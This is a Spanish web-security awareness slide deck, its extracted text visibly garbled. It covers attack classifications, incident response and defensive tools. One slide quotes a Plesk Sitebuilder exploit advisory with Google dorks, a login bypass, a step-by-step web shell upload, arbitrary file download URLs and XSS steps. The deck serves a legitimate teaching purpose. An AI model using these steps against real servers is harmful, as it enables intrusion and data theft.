Puede

mi si*o web sufrir un ataque? Qu puedo hacer?

NOTA: Durante los prximos minutos voy a ser algo parecido a la chica de la curva

AGENDA

1\\ Presentacin
2\\ Introduccin a la seguridad WEB y ataques existentes
3\\ Consecuencias. Ejemplos prcKcos
4\\ He sido atacado. Ahora que hago?
5\\ Herramientas y servicios con los que protegernos
6\\ Algunos consejos Kles
7\\ Hablamos?

Puede mi si*o web sufrir un ataque?

La respuesta es obvia:

Qu puedo hacer?

Introduccin a los ataques existentes

Clasicacin de amenazas WEB

h_p://projects.webappsec.org/f/WASC-TC-v2_0.pdf

Abuso de la funcionalidad: el abuso de funcionalidad es una tcnica

de ataque que uKliza las propias caractersKcas y funciones de un
siKo web para consumir, defraudar o eludir los mecanismos de
control de acceso.
Fuerza bruta: una ataque de fuerza bruta es un proceso
automaKzado de prueba y error que se uKliza para adivinar el
nombre de usuario, la contrasea, el nmero de tarjeta de crdito o
la clave criptogrca de una persona.
Desbordamiento de almacenamiento intermedio: los exploits de
desbordamiento de almacenamiento intermedio son ataques que
alteran el ujo de una aplicacin sobrescribiendo partes de la
memoria.
Usurpacin de contenido: la usurpacin de contenido es una
tcnica de ataque que se uKliza para hacer creer a un usuario que
determinado contenido que aparece en un siKo web es legKmo y
no procede de un origen externo.

Introduccin a los ataques existentes

Clasicacin de amenazas WEB

h_p://projects.webappsec.org/f/WASC-TC-v2_0.pdf

Prediccin de sesin/credenciales: la prediccin de sesin/

credenciales es un mtodo de apropiacin de idenKdad o
suplantacin de un usuario de siKo web. Deducir o adivinar el valor
nico que idenKca la sesin o el usuario concreto que efecta el
ataque.
Script entre si*os: el script entre siKos (XSS) es una tcnica de
ataque que obliga a un siKo web a duplicar el cdigo ejecutable
proporcionado por el atacante, que se carga en el navegador de un
usuario. Un usuario de un script entre siKos puede verse expropiado
de su cuenta (robo de cookies), su navegador puede ser redirigido a
otra ubicacin, o se le puede mostrar contenido fraudulento en el
siKo web que est visitando.
Denegacin de servicio: la denegacin de servicio (DoS) es una
tcnica de ataque cuyo objeKvo es impedir que un siKo web ofrezca
una acKvidad normal a los usuarios.

Introduccin a los ataques existentes

Clasicacin de amenazas WEB

h_p://projects.webappsec.org/f/WASC-TC-v2_0.pdf

Indexacin de directorios: el listado/indexacin automKca de

directorios es una funcin de servidor que lista todos los archivos en
un directorio solicitado si el archivo bsico normal (index.html/
home.html/default.htm) no est presente.
Ataque de serie de formato: los ataques de serie de formato alteran
el ujo de una aplicacin uKlizando caractersKcas de la biblioteca
de formatos de series para acceder a otro espacio de la memoria.
Filtrado de informacin: el ltraje de informacin se produce
cuando un siKo web revela datos condenciales, por ejemplo
comentarios de un desarrollador o mensajes de error, que pueden
ayudar a un atacante a aprovecharse del sistema.
An* automa*zacin insuciente: la anK automaKzacin insuciente
se produce cuando un siKo web permite a un atacante automaKzar
un proceso que slo debe realizarse manualmente.

Introduccin a los ataques existentes

Clasicacin de amenazas WEB

h_p://projects.webappsec.org/f/WASC-TC-v2_0.pdf

Auten*cacin insuciente: la autenKcacin insuciente se produce

cuando un siKo web permite a un atacante acceder a contenido o
funciones condenciales sin autenKcar correctamente sus permisos
de acceso.
Autorizacin insuciente: la autorizacin insuciente se produce
cuando un siKo web permite el acceso a contenido o funciones
condenciales que deben requerir un incremento de las
restricciones de control de acceso.
Validacin de proceso insuciente: la validacin de proceso
insuciente se produce cuando un siKo web permite a un atacante
eludir el control de ujo previsto de una aplicacin.
Caducidad de sesin insuciente: la caducidad de sesin
insuciente se produce cuando un siKo web permite a un atacante
reuKlizar credenciales de sesin o ID de sesin anKguos para llevar a
cabo la autorizacin. La caducidad de sesin insuciente aumenta la
exposicin de un siKo web a los ataques que roban o suplantan a
otros usuarios.

Introduccin a los ataques existentes

Clasicacin de amenazas WEB

h_p://projects.webappsec.org/f/WASC-TC-v2_0.pdf

Inyeccin LDAP: la inyeccin LDAP es una tcnica de ataque

uKlizada para aprovecharse de los siKos web que crean sentencias
LDAP (Lightweight Directory Access Protocol) a parKr de entradas
proporcionadas por los usuarios.
Envo de mandatos del SO: el envo de mandatos del SO es una
tcnica de ataque uKlizada para aprovecharse de los siKos web
mediante la ejecucin de mandatos del sistema operaKvo a travs
de la manipulacin de la entrada de la aplicacin.
Cruce de va de acceso: la tcnica de ataque de cruce de va de
acceso fuerza el acceso a archivos, directorios y mandatos que
pueden estar ubicados potencialmente fuera del directorio raz de
documentos. Un atacante podra manipular un URL de forma que el
siKo web ejecutar o revelar el contenido de archivos arbitrarios
en cualquier parte del servidor web.

Introduccin a los ataques existentes

Clasicacin de amenazas WEB

h_p://projects.webappsec.org/f/WASC-TC-v2_0.pdf

Ubicacin de recursos predecible: la ubicacin de recursos

predecible es una tcnica de ataque uKlizada para descubrir
contenido y funciones ocultas de un siKo web. El ataque, que se vale
de considerar la informacin de la que dispone, es una bsqueda de
fuerza bruta en busca de contenido que no est pensado para
mostrarse pblicamente. Archivos temporales, archivos de copia de
seguridad, archivos de conguracin y archivos de ejemplo son
todos ejemplos de archivos potencialmente sobrantes.
Fijacin de sesin: la jacin de sesin es una tcnica de ataque que
fuerza un ID de sesin de usuario a un valor explcito.
Inyeccin SQL: la inyeccin SQL es una tcnica de ataque uKlizada
para aprovecharse de los siKos web que crean sentencias SQL a
parKr de entradas proporcionadas por los usuarios.
Inyeccin SSI: la inyeccin SSI (inclusin del lado del servidor) es una
tcnica de aprovechamiento del lado del servidor que permite a un
atacante enviar cdigo en una aplicacin, que posteriormente el
servidor web ejecutar localmente.

Introduccin a los ataques existentes

Clasicacin de amenazas WEB

h_p://projects.webappsec.org/f/WASC-TC-v2_0.pdf

Validacin de recuperacin de contrasea dbil: la validacin de

recuperacin de contrasea dbil se produce cuando un siKo web
permite a un atacante obtener, cambiar o recuperar ilegalmente la
contrasea de otro usuario.
Inyeccin XPath: la inyeccin XPath es una tcnica de ataque
uKlizada para aprovecharse de los siKos web que crean consultas
XPath a parKr de entradas proporcionadas por los usuarios.

Introduccin a los ataques existentes

Consecuencias derivadas de los ataques

=!

Introduccin a los ataques existentes

Panorama

Introduccin a los ataques existentes

Panorama
Crouching YeK / EnergeKc Bear (Verano 2014)

Introduccin a los ataques existentes

Panorama

Introduccin a los ataques existentes

Introduccin a los ataques existentes

Introduccin a los ataques existentes

h_p://www.ddossite.com/

h_p://youtu.be/vn-lU3Zu3dw
h_p://youtu.be/aCacibJa0Ps

Introduccin a los ataques existentes

h_p://www.digitala_ackmap.com

Introduccin a los ataques existentes

Introduccin a los ataques existentes

Introduccin a los ataques existentes

Introduccin a los ataques existentes

#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# Title : MulKple VulnerabiliKes in Parallels Plesk Sitebuilder
# Author : alieye
# vendor : h_p://www.parallels.com/
# Contact : cseye_ut@yahoo.com
# Risk : High
# Class: Remote
#
# Google Dork:
# inurl::2006/Sites ext:aspx
# inurl::2006 inurl:.ashx?mediaid
# intext:" Copyright 2004-2007 SWso{." ext:aspx
# inurl:Wizard/HosKngPreview.aspx?SiteID
#
# Date: 23/07/2014
# os : windows server 2003
# poc video clip : h_p://alieye.persiangig.com/video/plesk.rar/download
#
# version : for uploading shell (Parallels Plesk panel 9.5 - Parallels Plesk Sitebuilder 4.5) Copyright 2004-2010
# version : for other bug (Parallels Plesk panel 9.5 - Parallels Plesk Sitebuilder 4.5) Copyright 2004-2014
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++
1-bypass loginpage (all version)
h_p://vicKm.com:2006/login.aspx
change url path to h_p://vicKm.com:2006/wizard
2-uploading shell via Live HTTP Headers(Copyright 2004-2010)
Tools Needed: Live HTTP Headers, Backdoor Shell
Step 1: Locate upload form on logo upload secKon in h_p://vicKm.com:2006/Wizard/DesignLayout.aspx
Step 2: Rename your shell to shell.asp.gif and start capturing data with
Live HTTP Headers
Step 3: Replay data with Live HTTP Headers -
Step 4: Change [Content-DisposiKon: form-data; name="ctl00$ContentStep$FileUploadLogo"; lename="shell.asp.gif"\r\n] to [Content-DisposiKon: form-data; name="ctl00$ContentS
$FileUploadLogo"; lename="shell.asp.asp"\r\n]
Step 5: go to shell path:
h_p://vicKm.com:2006/Sites/GUID Sitename created/App_Themes/green/images/shell_asp.asp
3-Arbitrary File Download Vulnerability(all version)
You can download any le from your target
h_p://vicKm.com:2006/Wizard/EditPage/ImageManager/Site.ashx?s=GUID Sitename created&p=lename
example:
h_p://vicKm.com:2006/Wizard/EditPage/ImageManager/Site.ashx?s=4227d5ca-7614-40b6-8dc6-02460354790b&p=web.cong
4-xss(all version)
you can inject xss code in all module of this page h_p://vicKm.com:2006/Wizard/Edit.aspx
goto this page (edit.aspx), click on one module (Blog-eShop-Forum-...) then goto "Add New Category" and insert xss code in Category descripKon and .... Enjoy :)
5-not authenKcaKon for making a website(all version)
making malicious page and phishing page with these paths
h_p://vicKm.com:2006/Wizard/Pages.aspx
h_p://vicKm.com:2006/Wizard/Edit.aspx
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[#] special members: ZOD14C , 4l130h1 , bully13 , 3.14nnph , amir
[#] Thanks To All cseye members and All Iranian Hackers
[#] website : h_p://cseye.vcp.ir/
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[#] Spt Tnx To Master of Persian Music: Hossein Alizadeh
[#] Hossein Alizadeh website : h_p://www.hosseinalizadeh.net/
[#] download ney-nava album : h_p://dnl1.tebyan.net/1388/02/2009052010245138.rar
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Introduccin a los ataques existentes

Introduccin a los ataques existentes

Introduccin a los ataques existentes

El objeKvo principal del TOP 10 OWASP es dar a conocer a los desarrolladores,
diseadores, arquitectos, gerentes, y organizaciones sobre las consecuencias
de las vulnerabilidades de seguridad ms importantes en aplicaciones web.
El TOP 10 provee de tcnicas bsicas sobre como protegerse en estas reas de
alto riesgo y tambin provee orientacin sobre los pasos a seguir.

Que se hable de top 10 no signica que no existan ms vulnerabilidades!!
Simplemente son las ms comunes.

Para muestra un botn:

h_p://youtu.be/dGLM_xjZZms

h_p://youtu.be/UtU1gGv9xNw

Evolucin OWASP Top 10

Consecuencias. Ejemplos prcKcos

Consecuencias. Ejemplos prcKcos

Consecuencias. Ejemplos prcKcos

Consecuencias. Ejemplos prcKcos

He sido atacado. Ahora que

hago?
El procedimiento vara dependiendo de mlKples variables pero podra ser algo
as:

1.- Poner el siKo web atacado oine.

2.- Guardar logs, hacer backup de la base de datos y de los archivos. Aplicar
FUEGO PURIFICADOR o contratar servicios de desinfeccin.

3.- Revisar todas las posibles extensiones vulnerables o framework e intentar
determinar el punto de entrada.

4.- Reinstalar framework, plugins, planKllas, bbdd, SO, desde un backup que se
sepa que est limpio. Parchear el posible punto de entrada.

5.-Cambiar todas las contraseas

6.- Si se ha sido intermediario de un ataque de watering hole o se cree que se han
podido ver compromeKdos datos de importancia, noKcar a posibles usuarios
afectados el incidente de seguridad.

He sido atacado. Ahora que

hago?
Denunciar si hemos sido vicKmas de un ataque

>Ertzaintza: delitosinformaKcos@ertzaintza.net
>Guardia Civil: h_ps://www.gdt.guardiacivil.es/webgdt/pinformar.php
>Policia Nacional: h_p://www.policia.es/colabora.php

Contratar servicios especializados de anlisis forense para que en caso
de que se quiera llevar a juicio el ataque, se disponga de pruebas vlidas
con las que afrontar la denuncia.

Herramientas y servicios con los que protegernos

WAF. Web ApplicaKon Firewall
Nos protege de:
>Vulnerabilidades de sistema operaKvo
>Vulnerabilidades de aplicacin
\\SQLi
\\XSS
\\LFI
\\RFI
\\DT
\\

Nos Kene que quedar claro que las aplicaciones y sistemas
operaKvos siguen siendo vulnerables. Parcheo Virtual

Herramientas y servicios con los que protegernos

WAF. Web ApplicaKon Firewall
De todos los colores y sabores:
>So{ware (Open Source, Propietarios)
>Virtuales
>Hardware
>As a Service (En la nube)

Herramientas y servicios con los que protegernos

WAF. Web ApplicaKon Firewall

Herramientas y servicios con los que protegernos

Sistemas AnK DDoS

Herramientas y servicios con los que protegernos

Servicios de monitorizacin de contenidos WEB+ Desinfeccin +IR

Herramientas y servicios con los que protegernos

Servicios de monitorizacin de contenidos WEB+ Desinfeccin +IR

Herramientas y servicios con los que protegernos

AutenKcacin mulKfactor / Proteccin de idenKdades digitales

Herramientas y servicios con los que protegernos

HosKngs/Housings especializados

Herramientas y servicios con los que protegernos

Herramientas de hardening de frameworks especicos, buenas
prcKcas,

Gua bsica seguridad Wordpress Inteco
h_p://www.inteco.es/le/WbpsPPREE7nfCgs9ZBYoAQ

Gua bsica seguridad Joomla Inteco
h_p://www.inteco.es/le/WbpsPPREE7naXKiMJlkT_g

Herramientas y servicios con los que protegernos

h_p://punkspider.hyperiongray.com

Herramientas y servicios con los que protegernos

h_p://sitecheck.sucuri.net/

Herramientas y servicios con los que protegernos

h_p://zulu.zscaler.com/

Herramientas y servicios con los que protegernos

Herramientas y servicios con los que protegernos

Algunos consejos Kles

\\ Contar con profesionales del desarrollo web SEGURO

\\ Cuando se contrate el servicio de presencia web hablar de que ocurre en caso
de que surjan vulnerabilidades, se sea vicKma de un ataque, Kempos de parcheo,
Plan de conKngencia)

\\ Antes de poner una web online comprobar su seguridad (Revisin cdigo,
Auditora WEB)

\\ Realizar asiduamente backups tanto de la base de datos como de la aplicacin
y sus cheros asociados.

Algunos consejos Kles

\\ Preparar un Plan de Recuperacin ante incidentes. Entrenarse, ponerlo a

prueba.

\\ No uKlizar la misma contrasea para todas las cuentas

\\ Cifrar la documentacin/datos online importantes

\\ Cambia de contraseas cada cierto Kempo

\\ Usuarios y contraseas personales e intransferibles

\\ Tener especial cuidado cuando se manejan datos sensibles (LOPD)

Algunos consejos Kles

\\ UKlizar mecanismos de autenKcacin de mlKples factore.

\\ Llevar un control sobre los CMS instalados y los diferentes plugins
(seguros)instalados

\\ Actualizar y parchear tanto sistemas como aplicaciones

\\ Integracin de sistemas Captchas para evitar herramientas automaKzadas.

\\ Contratar hosKngs, housings con servicios de seguridad adicionales (WAF,
ADDoS)

Algunos consejos Kles

Algunos consejos Kles

Algunos consejos Kles

Algunos consejos Kles

Algunos consejos Kles

h_p://es.linkedin.com/in/borjalanseros/
@borjalanseros
7\\ Hablamos?